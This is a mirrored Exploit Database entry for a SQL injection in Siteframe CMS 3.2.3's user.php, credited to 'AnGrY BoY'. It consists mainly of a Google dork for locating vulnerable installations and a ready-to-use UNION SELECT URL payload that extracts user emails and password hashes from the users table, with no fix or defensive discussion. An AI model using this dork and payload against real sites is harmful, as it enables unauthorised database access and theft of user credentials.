Siteframe CMS 3.2.3 – ‘user.php’ SQL Injection

• Exploit Database
• 34 阅读

• 作者： AnGrY BoY
  日期： 2010-12-29
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15852/

• # Exploit Title: Siteframe 'user.php' SQL Injection Vulnerability
  # Google Dork: "powered by Siteframe"
  # Date: 29/12/2010
  # Author: AnGrY BoY
  # Software Link: http://sitefrane.org/downloads/
  # Version: Siteframe 3.2.3
  # Tested on: windows SP2
  # CVE : N/A
  
  # expolit:
  
  # http://localhost/path/user.php?id=[SQL]
   
  # http://localhost/path/user.php?id=-2+UNION+SELECT+1,2,3,4,5,concat(user_email,0x3e,user_passwd),7,8,9,10,11+from+users--
  
  ======================================================================================
  # Special Thanks:- all h4kurd members